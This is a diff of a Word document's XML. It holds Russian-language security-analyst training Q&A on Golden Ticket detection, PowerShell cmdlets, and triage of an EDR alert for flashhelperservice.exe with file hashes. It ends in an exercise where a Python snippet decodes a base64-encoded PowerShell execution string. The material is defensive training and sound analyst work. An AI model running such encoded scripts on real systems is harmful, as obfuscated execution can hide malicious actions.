         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t xml:space="preserve">Анализ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Kerberos</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Анализ Kerberos</w:t>
+      </w:r>
       <w:r>
         <w:t>: Ищите аномальные запросы на получение билетов (TGT), которые могут указывать на использование поддельных билетов.</w:t>
       </w:r>
@@ -4689,26 +4158,10 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t xml:space="preserve">Конфигурация </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Kerberos</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">: Убедитесь, что настройки </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Kerberos</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> соответствуют рекомендациям безопасности, и используйте только современные версии протокола.</w:t>
+        <w:t>Конфигурация Kerberos</w:t>
+      </w:r>
+      <w:r>
+        <w:t>: Убедитесь, что настройки Kerberos соответствуют рекомендациям безопасности, и используйте только современные версии протокола.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4762,23 +4215,7 @@
         <w:t>Инструменты анализа</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">: Используйте инструменты, такие как </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>BloodHound</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> или </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Mimikatz</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, чтобы выявить аномалии в доступе и привилегиях.</w:t>
+        <w:t>: Используйте инструменты, такие как BloodHound или Mimikatz, чтобы выявить аномалии в доступе и привилегиях.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4865,15 +4302,7 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Следуя этим шагам, можно повысить вероятность выявления атак Golden </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Ticket</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> и улучшить общую безопасность сети.</w:t>
+        <w:t>Следуя этим шагам, можно повысить вероятность выявления атак Golden Ticket и улучшить общую безопасность сети.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4925,6 +4354,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Оценка ситуации</w:t>
       </w:r>
     </w:p>
@@ -4983,7 +4413,6 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
@@ -5060,15 +4489,7 @@
         <w:t>Проверка на вредоносное ПО</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">: Запустите антивирусные и </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>антималварные</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> сканирования.</w:t>
+        <w:t>: Запустите антивирусные и антималварные сканирования.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5281,34 +4702,24 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Какая функция </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>Какая функция PowerShell 5 является лучшей для команды безопасности?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">В </w:t>
+      </w:r>
       <w:r>
         <w:t>PowerShell</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 5 является лучшей для команды безопасности?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">В </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> 5.0 одной из лучших функций для команды безопасности является </w:t>
       </w:r>
@@ -5317,17 +4728,8 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Get-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>EventLog</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Get-EventLog</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">. Эта команда позволяет администраторам просматривать журналы событий </w:t>
       </w:r>
@@ -5358,17 +4760,8 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Get-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Acl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Get-Acl</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> – для получения списка прав доступа к файлам и папкам.</w:t>
       </w:r>
@@ -5380,7 +4773,6 @@
       <w:r>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -5388,7 +4780,6 @@
         </w:rPr>
         <w:t>Set-Acl</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> – для изменения прав доступа.</w:t>
       </w:r>
@@ -5405,17 +4796,8 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Get-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>WinEvent</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Get-WinEvent</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> – для работы с более современными журналами событий, позволяя фильтровать и анализировать события.</w:t>
       </w:r>
@@ -5427,21 +4809,12 @@
       <w:r>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Invoke</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>-Command</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Invoke-Command</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> – для выполнения команд на удаленных системах с учетом безопасности.</w:t>
@@ -5509,47 +4882,38 @@
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t xml:space="preserve">OS Type: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t>OS Type: windows</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t>windows</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>MD5: 59c34bc243eb2604533b5f08d30944f8</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t>MD5: 59c34bc243eb2604533b5f08d30944f8</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
         <w:t>SHA-256: ef214626923d76e24ae5299dd16c53b15847e91a97d2eea79ce951c6bead9b7c</w:t>
       </w:r>
     </w:p>
@@ -5558,6 +4922,7 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Что вы можете рассказать об этом случае?</w:t>
       </w:r>
     </w:p>
@@ -5571,297 +4936,256 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>На основании предоставленной информации об оповещении от решения EDR (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Endpoint</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t>На основании предоставленной информации об оповещении от решения EDR (Endpoint Detection and Response) мы можем оценить ситуацию следующим образом:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:u w:val="single"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Информация</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Detection</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>о</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>and</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Response) мы можем оценить ситуацию следующим образом:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>процессе</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:u w:val="single"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Информация</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>о</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>процессе</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
+        <w:t xml:space="preserve">    Process Name: flashhelperservice.exe</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    Process ID (PID): 6508</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    Operating System: Windows</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:u w:val="single"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Hash Values</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    MD5: 59c34bc243eb2604533b5f08d30944f8</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    SHA-256: ef214626923d76e24ae5299dd16c53b15847e91a97d2eea79ce951c6bead9b7c</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Вы можете проверить хэши на таких платформах, как VirusTotal, чтобы определить, является ли файл вредоносным.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>flashhelperservice.exe обычно связан со службой обновления Adobe Flash Player. Однако из-за окончания срока службы Flash Player любые экземпляры этой службы, работающие в современной системе, должны быть тщательно проверены.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Проверка на вредоносное ПО:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Используйте предоставленные хеш-значения (MD5 и SHA-256) для поиска в базах данных аналитики угроз (например, VirusTotal), чтобы определить, был ли этот конкретный файл помечен как вредоносный.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Репутация файла</w:t>
+      </w:r>
+      <w:r>
+        <w:t>: Если хэши возвращают положительные результаты, указывающие на то, что он безопасен или распознан как легитимный файл, вы можете продолжить мониторинг. Если файл помечен как вредоносный, вы должны немедленно предпринять действия для изоляции затронутой системы.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Контекстная информация</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: Происхождение файла: Определите, где находится файл (например, типичные пути установки или необычные каталоги). </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Родительский процесс: Проверьте, какой процесс запустил flashhelperservice.exe. Это может дать представление о том, был ли он инициирован легитимным приложением или чем-то подозрительным. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Анализ поведения</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: Изучите, какие действия предпринял процесс (например, сетевые подключения, изменения файлов) на основе телеметрии EDR. Ищите любые боковые перемещения или попытки связаться с внешними серверами. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Исторические данные</w:t>
+      </w:r>
+      <w:r>
+        <w:t>: Просмотрите журналы на предмет прошлых действий, связанных с этим процессом или похожими процессами.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Следующие шаги</w:t>
+      </w:r>
+      <w:r>
         <w:t>:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    Process Name: flashhelperservice.exe</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">    Process ID (PID): 6508</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    Operating System: Windows</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:u w:val="single"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Hash Values</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    MD5: 59c34bc243eb2604533b5f08d30944f8</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    SHA-256: ef214626923d76e24ae5299dd16c53b15847e91a97d2eea79ce951c6bead9b7c</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Вы можете проверить хэши на таких платформах, как </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>VirusTotal</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, чтобы определить, является ли файл вредоносным.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>flashhelperservice.exe обычно связан со службой обновления Adobe Flash Player. Однако из-за окончания срока службы Flash Player любые экземпляры этой службы, работающие в современной системе, должны быть тщательно проверены.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Проверка на вредоносное ПО:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Используйте предоставленные хеш-значения (MD5 и SHA-256) для поиска в базах данных аналитики угроз (например, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>VirusTotal</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>), чтобы определить, был ли этот конкретный файл помечен как вредоносный.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Репутация файла</w:t>
-      </w:r>
-      <w:r>
-        <w:t>: Если хэши возвращают положительные результаты, указывающие на то, что он безопасен или распознан как легитимный файл, вы можете продолжить мониторинг. Если файл помечен как вредоносный, вы должны немедленно предпринять действия для изоляции затронутой системы.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Контекстная информация</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">: Происхождение файла: Определите, где находится файл (например, типичные пути установки или необычные каталоги). </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Родительский процесс: Проверьте, какой процесс запустил flashhelperservice.exe. Это может дать представление о том, был ли он инициирован легитимным приложением или чем-то подозрительным. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Анализ поведения</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">: Изучите, какие действия предпринял процесс (например, сетевые подключения, изменения файлов) на основе телеметрии EDR. Ищите любые боковые перемещения или попытки связаться с внешними серверами. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Исторические данные</w:t>
-      </w:r>
-      <w:r>
-        <w:t>: Просмотрите журналы на предмет прошлых действий, связанных с этим процессом или похожими процессами.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Следующие шаги</w:t>
-      </w:r>
-      <w:r>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
         <w:t>Если процесс подтвержден как легитимный и необходимый, убедитесь, что он обновлен до последней версии, чтобы смягчить уязвимости.</w:t>
@@ -5885,15 +5209,7 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>Заключение (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Conclusion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>):</w:t>
+        <w:t>Заключение (Conclusion):</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5918,15 +5234,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>В ходе расследования вы видите следующую информацию:   (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>хеш</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
+        <w:t>В ходе расследования вы видите следующую информацию:   (хеш)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5955,6 +5263,7 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:tab/>
       </w:r>
       <w:r>
@@ -5962,14 +5271,7 @@
       </w:r>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>import</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> base64</w:t>
+        <w:t>import base64</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5984,21 +5286,8 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve"># Base64 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>encoded</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>string</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t># Base64 encoded string</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6017,18 +5306,7 @@
       </w:r>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>encoded_string</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = "JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIA</w:t>
-      </w:r>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>aQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBFAG0AcAB0AFcAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQ=="</w:t>
+        <w:t>encoded_string = "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"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6083,34 +5361,34 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t>decoded_bytes = base64.b64decode(encoded_string)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>decoded_bytes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> = base64.b64decode(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:tab/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>encoded_string</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:tab/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>)</w:t>
+        <w:tab/>
+        <w:t>decoded_string = decoded_bytes.decode('utf-8', errors='ignore')</w:t>
       </w:r>
     </w:p>
